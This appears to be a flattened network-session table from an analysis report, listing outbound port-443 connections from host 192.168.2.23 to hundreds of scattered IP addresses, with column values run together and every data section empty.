                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23683192.168.2.2334428173.221.200.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23684192.168.2.2345912150.67.193.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23685192.168.2.234965813.149.188.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23686192.168.2.2358866181.50.13.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23687192.168.2.2337736140.127.177.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23688192.168.2.2356964189.183.10.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23689192.168.2.2358196151.54.128.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23690192.168.2.235765836.75.16.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23691192.168.2.233867686.252.158.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23692192.168.2.2333216183.182.172.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23693192.168.2.2360524210.231.32.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23694192.168.2.2354014154.62.192.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23695192.168.2.2346018138.176.184.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23696192.168.2.2348640161.72.139.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23697192.168.2.2336584190.144.248.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23698192.168.2.235162835.237.112.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23699192.168.2.2338346147.195.150.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23700192.168.2.235415891.246.47.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23701192.168.2.2333856145.34.70.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23702192.168.2.2351700222.188.151.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23703192.168.2.2359154141.171.58.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23704192.168.2.2350122175.62.28.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23705192.168.2.2333400146.187.149.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23706192.168.2.2344578123.15.51.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23707192.168.2.234252497.157.102.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23708192.168.2.234612659.162.73.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23709192.168.2.2339510212.71.122.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23710192.168.2.2338470159.43.44.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23711192.168.2.236033820.110.93.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23712192.168.2.235386866.96.64.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23713192.168.2.234472052.216.250.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23714192.168.2.233587417.218.125.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23715192.168.2.2350050178.12.176.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23716192.168.2.2354976140.124.44.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23717192.168.2.2349882168.143.112.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23718192.168.2.2346400196.184.46.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23719192.168.2.2350240201.1.142.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23720192.168.2.233915693.10.146.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23721192.168.2.233708093.255.202.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23722192.168.2.233906062.105.56.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23723192.168.2.2355386182.241.48.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23724192.168.2.2346530146.207.95.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23725192.168.2.2352848192.73.132.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23726192.168.2.23449781.80.115.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23727192.168.2.23514702.152.84.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23728192.168.2.233423667.75.210.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23729192.168.2.2354202217.19.43.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23730192.168.2.235087641.83.186.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23731192.168.2.2355768169.211.190.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23732192.168.2.233988667.240.220.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23733192.168.2.2353808207.99.18.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23734192.168.2.2338814105.49.44.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23735192.168.2.2343586194.137.89.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23736192.168.2.2346164208.35.121.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23737192.168.2.2358180111.10.215.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23738192.168.2.2359694117.238.176.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23739192.168.2.234488464.61.120.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23740192.168.2.2339296108.196.215.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23741192.168.2.234063681.32.68.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23742192.168.2.235004835.211.103.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23743192.168.2.2346466193.243.127.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23744192.168.2.23500664.138.232.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23745192.168.2.2352664200.71.91.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23746192.168.2.2359988165.137.139.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23747192.168.2.233520276.208.152.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23748192.168.2.234132086.7.239.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23749192.168.2.2348164139.124.217.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23750192.168.2.2354320217.222.226.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23751192.168.2.2357414138.86.19.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23752192.168.2.234034067.240.220.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23753192.168.2.2344798113.15.87.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23754192.168.2.236084620.110.93.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23755192.168.2.2334528216.59.62.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23756192.168.2.2338182121.251.150.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23757192.168.2.2349598189.83.150.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23758192.168.2.2338970180.72.8.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23759192.168.2.233546649.74.86.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23760192.168.2.2348336164.158.18.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23761192.168.2.234177835.96.59.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23762192.168.2.2349936211.17.55.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23763192.168.2.2354380160.228.93.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23764192.168.2.2343754116.155.142.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23765192.168.2.233717625.252.154.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23766192.168.2.2344242208.33.158.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23767192.168.2.235269245.120.220.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23768192.168.2.2340996176.96.112.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23769192.168.2.235242887.173.153.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23770192.168.2.2343346183.25.194.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23771192.168.2.234716042.194.24.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23772192.168.2.2357946177.66.83.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23773192.168.2.234824050.41.246.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23774192.168.2.2343694207.19.243.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23775192.168.2.2348648205.219.204.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23776192.168.2.2356030149.180.203.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23777192.168.2.235272687.229.24.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23778192.168.2.23377329.65.236.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23779192.168.2.2344800193.19.251.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23780192.168.2.2342868105.59.76.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23781192.168.2.233841049.70.165.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23782192.168.2.234580296.211.230.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23783192.168.2.2334468109.129.35.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23784192.168.2.2357852119.179.78.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23785192.168.2.2335280163.90.196.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23786192.168.2.2360338126.220.180.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23787192.168.2.2333886181.68.174.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23788192.168.2.234882652.90.60.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23789192.168.2.2342460164.207.111.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23790192.168.2.2335406114.130.177.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23791192.168.2.2342550209.169.18.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23792192.168.2.2334650178.194.94.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23793192.168.2.235558845.100.182.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23794192.168.2.2348382103.18.198.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23795192.168.2.233837899.53.14.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23796192.168.2.235964095.211.246.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23797192.168.2.234660698.18.246.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23798192.168.2.235633085.18.76.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23799192.168.2.234906864.181.193.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23800192.168.2.2356984135.213.169.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23801192.168.2.2336182194.133.178.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23802192.168.2.2358154122.90.131.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23803192.168.2.234931291.49.136.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23804192.168.2.233579861.122.212.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23805192.168.2.2332900140.143.184.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23806192.168.2.2340462190.240.40.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23807192.168.2.235709819.218.87.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23808192.168.2.235547288.135.146.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23809192.168.2.2345658200.0.193.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23810192.168.2.2350168183.75.136.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23811192.168.2.2355300187.86.51.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23812192.168.2.2352388151.74.115.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23813192.168.2.2347076104.20.235.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23814192.168.2.235930648.130.241.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23815192.168.2.234298696.242.230.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23816192.168.2.2359002126.209.191.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23817192.168.2.2352718193.95.237.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23818192.168.2.2337924207.45.54.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23819192.168.2.234578099.150.121.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23820192.168.2.2354358122.252.24.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23821192.168.2.2353976152.243.77.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23822192.168.2.2356800209.55.145.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23823192.168.2.233526259.97.51.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23824192.168.2.234429252.36.201.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23825192.168.2.233420092.1.179.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23826192.168.2.2337192208.3.151.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23827192.168.2.2345570120.240.3.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23828192.168.2.2335326111.122.48.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23829192.168.2.2348176201.109.156.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23830192.168.2.235876285.153.149.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23831192.168.2.2336086141.129.156.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23832192.168.2.2334262147.155.124.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23833192.168.2.234128251.246.164.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23834192.168.2.2336398113.158.159.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23835192.168.2.2347178167.227.34.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23836192.168.2.2355156117.150.141.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23837192.168.2.23478684.151.230.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23838192.168.2.234097271.105.100.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23839192.168.2.2348750118.110.89.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23840192.168.2.2338660101.179.127.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23841192.168.2.2334652219.227.98.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23842192.168.2.235981224.183.203.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23843192.168.2.235229240.78.177.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23844192.168.2.2337736196.146.127.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23845192.168.2.2339172120.253.9.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23846192.168.2.2360784170.23.61.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23847192.168.2.2335156176.149.27.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23848192.168.2.2336898151.198.203.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23849192.168.2.2351220134.239.199.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23850192.168.2.234685661.156.121.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23851192.168.2.234673013.90.220.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23852192.168.2.2333290163.95.130.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23853192.168.2.2350542144.155.85.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23854192.168.2.2349346183.14.241.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23855192.168.2.23328662.145.152.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23856192.168.2.234002042.44.32.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23857192.168.2.234915058.124.78.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23858192.168.2.2358276176.109.48.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23859192.168.2.2354520151.221.3.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23860192.168.2.2358562199.11.57.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23861192.168.2.233442224.14.127.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23862192.168.2.2355252205.89.8.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23863192.168.2.2353526160.146.55.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23864192.168.2.235522832.139.27.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23865192.168.2.2336326193.59.228.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23866192.168.2.2346894132.148.75.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23867192.168.2.2341736211.9.181.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23868192.168.2.235268234.50.167.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23869192.168.2.2351504171.138.244.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23870192.168.2.234958886.249.189.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23871192.168.2.23542548.250.102.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23872192.168.2.235497864.207.155.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23873192.168.2.2338700158.92.89.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23874192.168.2.2352750109.144.153.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23875192.168.2.2358818187.19.98.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23876192.168.2.2355636142.195.172.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23877192.168.2.233882646.253.48.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23878192.168.2.234156294.225.16.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23879192.168.2.2337766202.0.24.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23880192.168.2.235730225.109.9.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23881192.168.2.2353358194.232.242.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23882192.168.2.2335750116.169.88.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23883192.168.2.2354928103.34.42.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23884192.168.2.2344024161.202.247.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23885192.168.2.235430044.246.26.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23886192.168.2.2345504181.67.180.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23887192.168.2.2345646203.224.121.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23888192.168.2.2351494188.37.24.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23889192.168.2.234456438.232.59.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23890192.168.2.2333638167.80.222.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23891192.168.2.234548873.95.37.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23892192.168.2.2350834142.225.119.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23893192.168.2.235655676.144.20.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23894192.168.2.2334730201.176.50.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23895192.168.2.2350966105.15.120.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23896192.168.2.2348576166.167.196.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23897192.168.2.234559817.74.122.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23898192.168.2.234535263.30.118.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23899192.168.2.2346520104.81.156.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23900192.168.2.2343742141.91.232.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23901192.168.2.2345794138.207.127.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23902192.168.2.2353348212.73.137.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23903192.168.2.23528185.193.52.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23904192.168.2.2350790149.43.96.217443
